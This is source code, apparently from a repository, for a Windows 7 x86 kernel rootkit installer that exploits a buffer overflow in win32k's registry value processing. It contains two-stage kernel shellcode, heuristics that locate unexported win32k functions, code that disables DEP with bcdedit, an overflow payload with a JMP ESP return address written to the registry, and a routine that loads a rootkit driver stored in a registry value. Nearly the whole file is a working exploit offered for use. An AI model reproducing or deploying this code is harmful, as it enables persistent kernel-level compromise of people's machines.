GetHalProcOffset(_proc_) GetKernelProcAddrEx("hal.dll", (_proc_), TRUE) PVOID GetKernelProcAddrEx(char *lpszModuleName, char *lpszProcName, BOOL bOffset) { PVOID Addr = NULL; // get kernel module address and file path char szModulePath[MAX_PATH]; PVOID ModuleBase = KernelGetModuleBase(lpszModuleName, szModulePath, MAX_PATH); if (ModuleBase) { // load kernel image as dynamic library HMODULE hModule = LoadLibraryExA(szModulePath, 0, DONT_RESOLVE_DLL_REFERENCES); if (hModule) { // get address of target function Addr = GetProcAddress(hModule, lpszProcName); if (Addr) { if (bOffset) { // calculate only function offsset Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule); } else { // calculate REAL address of this function Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule + (PUCHAR)ModuleBase); } } else { DbgMsg(__FILE__, __LINE__, "GetProcAddress() ERROR %d\n", GetLastError()); } FreeLibrary(hModule); } else { DbgMsg(__FILE__, __LINE__, "LoadLibraryEx() ERROR %d\n", GetLastError()); } } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Unable to locate \"%s\" module\n", lpszModuleName); } return Addr; } //-------------------------------------------------------------------------------------- #define marker_MmIsAddressValid 'Val0' __declspec(naked) void Shellcode_1(void) { __asm { /** * 1-st STAGE SHELLCODE BEGIN * * EBX allways points to the win32k!NtUserInitialize() * */ #ifdef USE_SHELLCODE_DEBUGBREAK int 3 #endif /** * Find kernel adderss */ mov eax, fs:[KPCR_SelfPcr] mov edi, dword ptr [eax + KPCR_KdVersionBlock] xor di, di _find_kernel: cmp word ptr [edi], IMAGE_DOS_SIGNATURE je _kernel_ok sub edi, PAGE_SIZE jmp short _find_kernel _kernel_ok: // get address of nt!MmIsAddressvalid() add edi, marker_MmIsAddressValid /** * Find 2-nd shellcode, that has been stored in registry hive, * in kernel memory. */ mov esi, REG_HIVE_ADDRESS _loop: // check for valid address push esi call edi test al, al jz _no_match /** * Check signature by 8 bytes */ cmp dword ptr [esi], REG_SIGN_1 jne _no_match cmp byte ptr [esi + 4], 0x90 jne _no_match // signature matched! jmp esi _no_match: add esi, 0x10 jmp short _loop } // end marker EMIT('~' _ 'E' _ 'N' _ 'D') } //-------------------------------------------------------------------------------------- /** * Constants and flags for RtlQueryRegistryValues() */ // RTL_QUERY_REGISTRY_DIRECT | RTL_QUERY_REGISTRY_REQUIRED #define QUERY_REGISTRY_TABLE_FLAGS 0x00000024 // RTL_REGISTRY_CONTROL | RTL_REGISTRY_OPTIONAL #define QUERY_REGISTRY_RELATIVETO 0x80000002 #define QUERY_REGISTRY_TABLE_SIZE 0x38 __declspec(naked) void Shellcode_2(void) { __asm { /** * 2-nd STAGE SHELLCODE BEGIN * * EBX - win32k!NtUserInitialize() * EDI - nt!MmIsAddressValid() * */ #ifdef USE_SHELLCODE_DEBUGBREAK int 3 #endif /** * Calculate shellcode address. */ mov esi, ebx call _realloc _realloc: pop ebx sub ebx, _realloc /** * Find win32k address */ xor si, si _find_win32: cmp word ptr [esi], IMAGE_DOS_SIGNATURE je _win32_ok sub esi, PAGE_SIZE jmp short _find_win32 _win32_ok: mov [ebx + _params + _win32k_base], esi // get kernel image start addreess mov ecx, [ebx + _params + _MmIsAddressValid] sub edi, ecx mov [ebx + _params + _kernel_base], edi /** * Patch win32k!bInitializeEUDC() to prevent * multipile vulnerability triggering. */ mov ecx, [ebx + _params + _bInitializeEUDC_patch] add ecx, esi // disable memory write protection mov eax, cr0 and eax, not 000010000h mov cr0, eax // perform patching with add esp, 0x14 / nop mov word ptr [ecx + 0], '\x83\xc4' mov word ptr [ecx + 2], '\x14\x90' // enable memory write protection which was supposed to do mov eax, cr0 or eax, 000010000h mov cr0, eax /**************************************************** * Place any payload here: */ mov edx, [ebx + _params + _rootkit_size] add edx, 0x100 mov ecx, [ebx + _params + _ExAllocatePool] add ecx, edi // call nt!ExAllocatePool() and allocate memory for rootkit image push edx push edx push 0 call ecx pop edx test eax, eax jz _err_payload /* RtlQueryRegistryValues() remark: The buffer pointed to by EntryContext must begin with a signed LONG value. The magnitude of the value must specify the size, in bytes, of the buffer. */ neg edx mov [eax], edx mov ebp, eax /* RTL_QUERY_REGISTRY_TABLE (0x1c bytes): +00 QueryRoutine +04 Flags +08 Name +0c EntryContext +10 DefaultType +14 DefaultData +18 DefaultLength */ // allocate memory for RTL_QUERY_REGISTRY_TABLE[2] mov edx, esp mov ecx, QUERY_REGISTRY_TABLE_SIZE sub esp, ecx // fill with zero bytes push edx xchg edi, edx xor eax, eax rep stosb xchg edi, edx pop edx // filling the structure mov dword ptr [edx + 0x04], QUERY_REGISTRY_TABLE_FLAGS lea eax, [ebx + _drv_val_name] mov [edx + 0x08], eax mov [edx + 0x0c], ebp push 0 push 0 push edx push 0 push QUERY_REGISTRY_RELATIVETO // call nt!RtlQueryRegistryValues() mov ecx, [ebx + _params + _RtlQueryRegistryValues] add ecx, edi call ecx add esp, QUERY_REGISTRY_TABLE_SIZE test eax, eax jnz _err_payload // check for DOS signature of readed data cmp word ptr [ebp], IMAGE_DOS_SIGNATURE jne _err_payload mov [ebx + _params + _rootkit_base], ebp mov ecx, ebp add ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew mov ecx, [ecx + 0x28] // IMAGE_OPTIONAL_HEADER::AddressOfEntryPoint add ecx, ebp // call image entry point lea eax, [ebx + _params] push eax // RegistryPath argument push 0 // DriverObject argument call ecx _err_payload: #ifdef USE_SHELLCODE_DBGPRINT lea ecx, [ebx + _params + _szDbgPrintMessage] push ecx // call nt!DbgPrint() mov ecx, [ebx + _params + _DbgPrint] add ecx, edi call ecx pop eax #endif /****************************************************/ /** * Make the rest of the stuff that had to be made * by the win32k!NtUserInitialize() */ // get current process mov ecx, [ebx + _params + _PsGetCurrentProcess] add ecx, edi call ecx // set flags in PROCESSINFO mov ecx, [ebx + _params + _PsGetProcessWin32Process] add ecx, edi push eax call ecx add eax, 8 or dword ptr [eax], WIN32_PROCESS_FLAGS // call win32k!UserInitialize() mov ecx, [ebx + _params + _UserInitialize] add ecx, esi call ecx /** * Return back to the nt!_KiFastCallEntry() * with STATUS_SUCCESS. */ // get kernel image end addreess mov ecx, edi add ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew mov ecx, [ecx + 0x50] // IMAGE_OPTIONAL_HEADER::SizeOfImage add ecx, edi // get kernel image start addreess mov ebp, [ebx + _params + _MmIsAddressValid] add ebp, edi _find_ki_ret: // Lookup for nt!_KiFastCallEntry()+XX and EBP value in stack. mov ebx, edx pop edx // check for the kernel pointer cmp edx, edi jb _find_ki_ret cmp edx, ecx ja _find_ki_ret pushad // check for valid address push edx call ebp test al, al popad jz _find_ki_ret /* Check for the instruction, at return address from the system service: call ebx ; system service call test byte ptr [ebp+6Ch], 1 ; returns here jz short loc_4357D4 ... */ cmp word ptr [edx], '\xf6\x45' jne _find_ki_ret // return to the nt!_KiFastCallEntry() with STATUS_SUCCESS xor eax, eax mov ebp, ebx jmp edx _drv_val_name: EMIT('P' _ '\x0' _ 'C' _ '\x0' _ 'I' _ '\x0' _ '\x0' _ '\x0') _params: /** * Shellcode constants, see SC_PARAMS struct above */ } // end marker EMIT('~' _ 'E' _ 'N' _ 'D') } //-------------------------------------------------------------------------------------- DWORD ScGetSize(PDWORD pData) { DWORD dwSize = 0; PDWORD Ptr = pData; // get size of code while (*Ptr != ENDM) { dwSize++; // check for the end marker Ptr = (PDWORD)((DWORD)Ptr + 1); } return dwSize; } //-------------------------------------------------------------------------------------- BOOL ScWriteDword(PVOID pData, DWORD dwSize, DWORD dwMarker, DWORD dwValue) { // find value pisition in bytes buffer by marker for (DWORD i = 0; i < dwSize - sizeof(DWORD); i++) { if (*(PDWORD)((PUCHAR)pData + i) == dwMarker) { // replace marker with the value *(PDWORD)((PUCHAR)pData + i) = dwValue; return TRUE; } } return FALSE; } //-------------------------------------------------------------------------------------- /** * Constants for win32k.sys image analysis. */ #define WIN32K_STR_1 L"\\Windows\\WindowStations" #define WIN32K_STR_2 L"FontLinkDefaultChar" #define WIN32K_STDCALL_PROLOG "\x8b\xff\x55\x8b\xec" #define WIN32K_STDCALL_PROLOG_LEN 5 BOOL AnalyseWin32k(PDWORD poffset_UserInitialize, PDWORD poffset_bInitializeEUDC_patch) { DWORD offset_UserInitialize = 0; DWORD offset_bInitializeEUDC_patch = 0; char szPath[MAX_PATH]; GetSystemDirectory(szPath, MAX_PATH); strcat_s(szPath, MAX_PATH, "\\win32k.sys"); HMODULE hMod = LoadLibraryEx(szPath, NULL, DONT_RESOLVE_DLL_REFERENCES); if (hMod) { PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew); PIMAGE_SECTION_HEADER pSection = NULL, pCodeSection = NULL; PIMAGE_BASE_RELOCATION pRelocation = NULL; ULONG RelocationSize = 0, NumberOfSections = 0; ULONGLONG OldBase = 0; if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA( hMod, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress ); RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = (ULONGLONG)pHeaders32->OptionalHeader.ImageBase; NumberOfSections = pHeaders32->FileHeader.NumberOfSections; pSection = (PIMAGE_SECTION_HEADER) (pHeaders32->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders32->OptionalHeader); } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA( hMod, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress ); RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = pHeaders64->OptionalHeader.ImageBase; NumberOfSections = pHeaders64->FileHeader.NumberOfSections; pSection = (PIMAGE_SECTION_HEADER) (pHeaders64->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders64->OptionalHeader); } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__"() ERROR: Unkown machine type\n"); FreeLibrary(hMod); return FALSE; } // enumerate image sections for (ULONG i = 0; i < NumberOfSections; i++) { // find section, that contains global variable if (!strncmp((char *)&pSection->Name, ".text", 5)) { pCodeSection = pSection; break; } pSection += 1; } if (pRelocation && pCodeSection) { // parse image relocation table ULONG Size = 0; while (RelocationSize > Size && pRelocation->SizeOfBlock) { ULONG Number = (pRelocation->SizeOfBlock - 8) / 2; PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8); for (ULONG i = 0; i < Number; i++) { if (Rel[i] > 0) { USHORT Type = (Rel[i] & 0xF000) >> 12; ULONG Rva = 0; PVOID *Va = NULL; // get address of global variable that used by our instruction if (Type == IMAGE_REL_BASED_HIGHLOW || Type == IMAGE_REL_BASED_DIR64) { Rva = pRelocation->VirtualAddress + (Rel[i] & 0x0FFF); Va = (PVOID *)RVATOVA(hMod, Rva); } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__ "() ERROR: Unknown relocation type (%d)\n", Type); } if (Va && Rva > 0 && Rva > pCodeSection->VirtualAddress && Rva < pCodeSection->VirtualAddress + pCodeSection->Misc.VirtualSize) { // get address of global variable, that requre fixup PVOID VarAddr = *Va; VarAddr = (PVOID)((ULONGLONG)VarAddr - OldBase + (PUCHAR)hMod); if (!IsBadStringPtrW((LPWSTR)VarAddr, MAX_PATH)) { if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_1)) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): \"%ws\" referenced at offset 0x%.8x\n", WIN32K_STR_1, Rva ); // lookup for stdcall prolog of win32k!UserInitialize() for (DWORD i = 0; i < 50; i++) { if (!memcmp( (PUCHAR)Va - i, WIN32K_STDCALL_PROLOG, WIN32K_STDCALL_PROLOG_LEN)) { if (offset_UserInitialize > 0) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"() ERROR: multipile heuristic matches for win32k!UserInitialize()\n" ); FreeLibrary(hMod); return FALSE; } offset_UserInitialize = Rva - i; DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): win32k!UserInitialize() found at offset 0x%.8x\n", offset_UserInitialize ); break; } } } else if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_2)) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): \"%ws\" referenced at offset 0x%.8x\n", WIN32K_STR_2, Rva ); /* Check for the following code in win32k!bInitializeEUDC(): mov ?SharedQueryTable@@A.Name, offset aFontlinkdefaul ; "FontLinkDefaultChar" mov ?SharedQueryTable@@A.EntryContext, eax call edi ; RtlQueryRegistryValues(x,x,x,x,x) test eax, eax jge short loc_BF80525F */ LONG InstPtr = -6; PUCHAR pInst = (PUCHAR)Va; if (*(PUSHORT)(pInst + InstPtr) == 0x05c7) { // disassemble next 5 instructions for (DWORD i = 0; i < 5; i++) { LONG InstLen = (LONG)c_Catchy(pInst + InstPtr); if (InstLen == (LONG)CATCHY_ERROR) { DbgMsg(__FILE__, __LINE__, __FUNCTION__"() ERROR: c_Catchy() fails\n"); FreeLibrary(hMod); return FALSE; } InstPtr += InstLen; // check for call edi / test eax, eax if (*(PUSHORT)(pInst + InstPtr + 0) == 0xd7ff && *(PUSHORT)(pInst + InstPtr + 2) == 0xc085) { if (offset_bInitializeEUDC_patch > 0) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"() ERROR: multipile heuristic matches for win32k!bInitializeEUDC()\n" ); FreeLibrary(hMod); return FALSE; } offset_bInitializeEUDC_patch = Rva + InstPtr; DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): win32k!bInitializeEUDC() CALL EDI found at offset 0x%.8x\n", offset_bInitializeEUDC_patch ); break; } } } } } } } } pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock); Size += pRelocation->SizeOfBlock; } } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__ "() ERROR: Relocation directory not found\n"); } FreeLibrary(hMod); } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): LoadLibraryEx() ERROR %d\n", GetLastError()); } if (offset_UserInitialize > 0 && offset_bInitializeEUDC_patch > 0) { *poffset_UserInitialize = offset_UserInitialize; *poffset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch; return TRUE; } return FALSE; } //-------------------------------------------------------------------------------------- #define GET_KERNEL_PROC_OFFSET(_fn_) \ \ DWORD offset_##_fn_ = (DWORD)GetKernelProcOffset(#_fn_); \ if (offset_##_fn_ == NULL) \ { \ DbgMsg(__FILE__, __LINE__, "ERROR: nt!" #_fn_ "() is not found\n"); \ goto end; \ } \ else \ { \ DbgMsg( \ __FILE__, __LINE__, "nt!" #_fn_ "() offset is 0x%.8x\n", \ offset_##_fn_ \ ); \ } int _tmain(int argc, _TCHAR* argv[]) { DbgMsg( __FILE__, __LINE__, "\n***********************************************************\n\n" " Windows kernrel rootkit PoC using registry values processing BoF.\n" " FOR INTERNAL USE ONLY!\n\n" " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)\n" " cr4sh@riseup.net\n" "\n***********************************************************\n\n" ); BOOL bSupportedOS = TRUE; #if defined(_X86_) BOOL bIs64 = FALSE; typedef BOOL (WINAPI * func_IsWow64Process)( HANDLE hProcess, PBOOL Wow64Process ); func_IsWow64Process f_IsWow64Process = (func_IsWow64Process) GetProcAddress(GetModuleHandle("kernel32.dll"), "IsWow64Process"); if (f_IsWow64Process) { // check for WOW64 environment f_IsWow64Process(GetCurrentProcess(), &bIs64); } bSupportedOS = !bIs64; #endif // _X86_ OSVERSIONINFOA Version; Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); if (GetVersionExA(&Version)) { if (Version.dwPlatformId != VER_PLATFORM_WIN32_NT || Version.dwMajorVersion != 6 || Version.dwMinorVersion != 1) { bSupportedOS = FALSE; } } else { DbgMsg(__FILE__, __LINE__, "GetVersionEx() ERROR %d\n", GetLastError()); goto end; } if (!bSupportedOS) { MessageBox( 0, "This PoC supports only x86 versions of Windows 7 and Server 2008 R2", "ERROR", MB_ICONERROR ); return -1; } // check for the uninstall option if (argc >= 2 && !strcmp(argv[1], "--uninstall")) { DbgMsg( __FILE__, __LINE__, "[+] Deleting 1-st shellcode from \"%s\\%s\"...\n", EXPL_KEY, EXPL_VAL ); HKEY hKey; LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey); if (Code == ERROR_SUCCESS) { // delete first rootkit part Code = RegDeleteValue(hKey, EXPL_VAL); if (Code == ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "[+] DELETED\n"); } else if (Code == ERROR_FILE_NOT_FOUND) { DbgMsg(__FILE__, __LINE__, "[!] NOT FOUND\n"); } else { DbgMsg(__FILE__, __LINE__, "RegDeleteValue() ERROR %d\n", Code); } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } DbgMsg(__FILE__, __LINE__, "[+] Deleting 2-nd shellcode from \"%s\\%s\"...\n", SC2_KEY, SC2_VAL); Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey); if (Code == ERROR_SUCCESS) { // delete first rootkit part Code = RegDeleteValue(hKey, SC2_VAL); if (Code == ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "[+] DELETED\n"); } else if (Code == ERROR_FILE_NOT_FOUND) { DbgMsg(__FILE__, __LINE__, "[!] NOT FOUND\n"); } else { DbgMsg(__FILE__, __LINE__, "RegDeleteValue() ERROR %d\n", Code); } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } MessageBox(0, "Rootkit uninstalled!", "SUCCESS", MB_ICONINFORMATION); return 0; } if (argc >= 2 && !strcmp(argv[1], "--dbgbreaks")) { m_DebugBreaks = TRUE; } DbgMsg(__FILE__, __LINE__, "[+] Disabling DEP...\n"); system("bcdedit.exe /set {current} nx AlwaysOff"); system("bcdedit.exe /set {current} pae ForceEnable"); DWORD dwShellcodeSize_1 = ScGetSize((PDWORD)Shellcode_1); DWORD dwShellcodeSize_2 = ScGetSize((PDWORD)Shellcode_2); DbgMsg(__FILE__, __LINE__, "[+] 1-st shellcode size is %d bytes\n", dwShellcodeSize_1); DbgMsg(__FILE__, __LINE__, "[+] 2-nd shellcode size is %d bytes\n", dwShellcodeSize_2); DWORD offset_UserInitialize = 0; DWORD offset_bInitializeEUDC_patch = 0; // find unexported functions of win32k, that are needed for exploitation if (!AnalyseWin32k(&offset_UserInitialize, &offset_bInitializeEUDC_patch)) { DbgMsg(__FILE__, __LINE__, "ERROR: win32k.sys image analysis fails\n"); goto end; } GET_KERNEL_PROC_OFFSET(MmIsAddressValid); GET_KERNEL_PROC_OFFSET(PsGetCurrentProcess); GET_KERNEL_PROC_OFFSET(PsGetProcessWin32Process); GET_KERNEL_PROC_OFFSET(ExAllocatePool); GET_KERNEL_PROC_OFFSET(RtlQueryRegistryValues); GET_KERNEL_PROC_OFFSET(DbgPrint); HKEY hKey; LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey); if (Code == ERROR_SUCCESS) { int Ptr = 0, SignLen = lstrlen(REG_SIGN_FULL); UCHAR Buff[SHELLCODE_2_MAX_BUFF_SIZE]; FillMemory(&Buff, sizeof(Buff), 0x90); for (int i = 0; i <= 16; i++) { /** * Place signatures at different offsets from the * begining of the buffer. * * kd> s 0x8d000000 Lffffff 0x40 0x50 0x41 0x51 0x90 * */ memcpy(&Buff[Ptr + i], REG_SIGN_FULL, SignLen); Ptr += 16; } if (SHELLCODE_2_MAX_BUFF_SIZE - (DWORD)Ptr <= dwShellcodeSize_2) { DbgMsg(__FILE__, __LINE__, "ERROR: Buffer to small\n"); goto end; } // copy 2-nd shellcode to the buffer memcpy(&Buff[Ptr], Shellcode_2, dwShellcodeSize_2); PSC_PARAMS ShellcodeParams = (PSC_PARAMS)(&Buff[Ptr + dwShellcodeSize_2]); ZeroMemory(ShellcodeParams, sizeof(SC_PARAMS)); if (Buff[Ptr] == 0xcc && !m_DebugBreaks) { // remove debug break Buff[Ptr] = 0x90; } // set constants and parameters for 2-nd shellcode ShellcodeParams->offset_MmIsAddressValid = offset_MmIsAddressValid; ShellcodeParams->offset_PsGetCurrentProcess = offset_PsGetCurrentProcess; ShellcodeParams->offset_PsGetProcessWin32Process = offset_PsGetProcessWin32Process; ShellcodeParams->offset_ExAllocatePool = offset_ExAllocatePool; ShellcodeParams->offset_RtlQueryRegistryValues = offset_RtlQueryRegistryValues; ShellcodeParams->offset_UserInitialize = offset_UserInitialize; ShellcodeParams->offset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch; ShellcodeParams->rootkit_size = sizeof(rootkit_driver); #ifdef USE_SHELLCODE_DBGPRINT ShellcodeParams->offset_DbgPrint = offset_DbgPrint; strcpy_s(ShellcodeParams->szDbgPrintMessage, DBGPRINT_MESSAGE_LEN, DBGPRINT_MESSAGE); #endif DbgMsg(__FILE__, __LINE__, "[+] Saving 2-nd shellcode to \"%s\\%s\"...\n", SC2_KEY, SC2_VAL); Code = RegSetValueEx(hKey, SC2_VAL, 0, REG_BINARY, (PBYTE)&Buff, sizeof(Buff)); if (Code != ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "RegSetValueEx() ERROR %d\n", Code); } else { DbgMsg(__FILE__, __LINE__, "[+] SUCCESS\n"); } DbgMsg(__FILE__, __LINE__, "[+] Saving rootkit image to \"%s\\%s\"...\n", SC2_KEY, DRV_VAL); Code = RegSetValueEx(hKey, DRV_VAL, 0, REG_BINARY, (PBYTE)&rootkit_driver, sizeof(rootkit_driver)); if (Code != ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "RegSetValueEx() ERROR %d\n", Code); } else { DbgMsg(__FILE__, __LINE__, "[+] SUCCESS\n"); } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } DWORD dwDataSize = BOF_MIN_LENGTH + dwShellcodeSize_1; PVOID pData = malloc(dwDataSize); if (pData) { *(PDWORD)((PUCHAR)pData + BOF_RET_OFFSET) = JMP_ESP_ADDR; memcpy((PUCHAR)pData + BOF_MIN_LENGTH, Shellcode_1, dwShellcodeSize_1); if (*((PUCHAR)pData + BOF_MIN_LENGTH) == 0xcc && !m_DebugBreaks) { // remove debug break *((PUCHAR)pData + BOF_MIN_LENGTH) = 0x90; } ScWriteDword( (PUCHAR)pData + BOF_MIN_LENGTH, dwShellcodeSize_1, marker_MmIsAddressValid, offset_MmIsAddressValid ); DbgMsg(__FILE__, __LINE__, "[+] Adding malicious data for value \"%s\\%s\"...\n", EXPL_KEY, EXPL_VAL); Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey); if (Code == ERROR_SUCCESS) { // set malicious value Code = RegSetValueEx(hKey, EXPL_VAL, 0, REG_BINARY, (PBYTE)pData, dwDataSize); if (Code != ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "RegSetValueEx() ERROR %d\n", Code); } else { DbgMsg(__FILE__, __LINE__, "[+] SUCCESS\n"); if (MessageBox( 0, "Rootkit installed, rebot the box now?", "SUCCESS", MB_ICONINFORMATION | MB_YESNO) == IDYES) { // reboot the system LoadPrivileges(SE_SHUTDOWN_NAME); ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION); return 0; } } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } free(pData); } end: printf("Press any key to quit...\n"); _getch(); return 0; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_installer/rootkit_installer.vcproj ================================================ ================================================ FILE: src/rootkit_installer/stdafx.cpp ================================================ // stdafx.cpp : source file that includes just the standard includes // win32k_FontLinkDefaultChar.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h" // TODO: reference any additional headers you need in STDAFX.H // and not in this file ================================================ FILE: src/rootkit_installer/stdafx.h ================================================ #pragma once #include "targetver.h" #include #include #include #include #define USE_SHELLCODE_DBGPRINT #define USE_DEBUG_DRIVER #include "../common/common.h" #include "../common/ntdll_defs.h" #include "../common/undocnt.h" #include "../common/debug.h" #include "../common/catchy32.h" #include "../common/shellcode2_struct.h" #pragma comment(lib, "../common/catchy32.lib") ================================================ FILE: src/rootkit_installer/targetver.h ================================================ #pragma once // The following macros define the minimum required platform. The minimum required platform // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run // your application. The macros work by enabling all features available on platform versions up to and // including the version specified. // Modify the following defines if you have to target a platform prior to the ones specified below. // Refer to MSDN for the latest info on corresponding values for different platforms. #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. #endif